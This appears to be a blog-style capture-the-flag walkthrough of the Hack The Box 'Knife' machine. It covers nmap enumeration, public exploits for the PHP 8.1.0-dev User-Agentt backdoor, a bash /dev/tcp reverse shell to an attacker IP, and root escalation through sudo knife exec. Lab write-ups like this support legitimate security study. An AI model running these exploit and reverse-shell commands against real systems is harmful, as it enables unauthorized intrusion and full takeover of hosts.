# Enumeration
## nmap
# nmap -p- -A -v 10.10.10.242 -oA knife
<deleted>
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
| 256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
|_ 256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Emergent Medical Idea
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
#### Port 80 HTTP
Additional information leaked from headers
![[Pasted image 20210720125601.png]]
#### Searchsploit
Looking at the php, apache versions I have discovered that PHP is vulnerable and there is a python script that spawns shell.
# searchsploit -m php/webapps/49933.py
Exploit: PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution
URL: https://www.exploit-db.com/exploits/49933
Path: /usr/share/exploitdb/exploits/php/webapps/49933.py
File Type: HTML document, ASCII text, with CRLF line terminators
Copied to: /root/49933.py
# Exploit
# python3 49933.py 1 ⨯
Enter the full host url:
http://knife.htb
Interactive shell is opened on http://knife.htb
Can't acces tty; job crontol turned off.
$ whoami
james
$
# Privilege Escalation
$ sudo -l
Matching Defaults entries for james on knife:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User james may run the following commands on knife:
(root) NOPASSWD: /usr/bin/knife
$ file /usr/bin/knife
/usr/bin/knife: symbolic link to /opt/chef-workstation/bin/knife
$ file /opt/chef-workstation/bin/knife
/opt/chef-workstation/bin/knife: a /opt/chef-workstation/embedded/bin/ruby --disable-gems script, ASCII text executable
$ sudo /usr/bin/knife exec --help
knife exec [SCRIPT] (options)
-s, --server-url URL Chef Infra Server URL.
--chef-zero-host HOST Host to start Chef Infra Zero on.
--chef-zero-port PORT Port (or port range) to start Chef Infra Zero on. Port ranges like 1000,1010 or 8889-9999 will try all given ports until one works.
-k, --key KEY Chef Infra Server API client key.
--[no-]color Use colored output, defaults to enabled.
-c, --config CONFIG The configuration file to use.
--config-option OPTION=VALUE Override a single configuration option.
--defaults Accept default values for all questions.
-d, --disable-editing Do not open EDITOR, just accept the data as is.
-e, --editor EDITOR Set the editor to use for interactive commands.
--environment ENVIRONMENT Set the Chef Infra Client environment (except for in searches, where this will be flagrantly ignored).
-E, --exec CODE A string of Chef Infra Client code to execute.
--[no-]fips Enable FIPS mode.
-F, --format FORMAT Which format to use for output. (valid options: 'summary', 'text', 'json', 'yaml', or 'pp')
--[no-]listen Whether a local mode (-z) server binds to a port.
-z, --local-mode Point knife commands at local repository instead of Chef Infra Server.
-u, --user USER Chef Infra Server API client username.
--print-after Show the data after a destructive operation.
--profile PROFILE The credentials profile to select.
-p, --script-path PATH:PATH A colon-separated path to look for scripts in.
-V, --verbose More verbose output. Use twice (-VV) for additional verbosity and three times (-VVV) for maximum verbosity.
-v, --version Show Chef Infra Client version.
-y, --yes Say yes to all prompts for confirmation.
-h, --help Show this help message.
$ sudo knife exec -E 'exec "/bin/sh -i"'
No input file specified.
$ exit
$ ^CExiting...
Tried multiple inputs but I am constantly getting *No input file specified.* I think it is because of the exploit. Let's find another one.
# wget https://dl.packetstormsecurity.net/2105-exploits/php_8.1.0-dev.py.txt -o php-exploit.py
# cat php-exploit.py
<deleted>
#Usage: python3 php_8.1.0-dev.py -u http://10.10.10.242/ -c ls
<deleted>
# python3 php-exploit.py -u http://knife.htb -c id
[+] Results:
uid=1000(james) gid=1000(james) groups=1000(james)
# nc -nvlp 1234 1 ⨯
listening on [any] 1234 ...
# python3 php-exploit.py -u http://knife.htb -c "/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.7/1234 0>&1'"
Now that we have reverse shell and we can freely interact, we can continue on.```bash
# nc -nvlp 1234
listening on [any] 1234 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.242] 51272
bash: cannot set terminal process group (944): Inappropriate ioctl for device
bash: no job control in this shell
james@knife:/$
james@knife:/$
james@knife:/tmp$ sudo /usr/bin/knife exec -E "exec '/bin/sh -i'"
sudo /usr/bin/knife exec -E "exec '/bin/sh -i'"
/bin/sh: 0: can't access tty; job control turned off
# whoami
root
Pretty good. Enjoy your day! 🙂
0 Comments
Recommended Comments
Няма коментари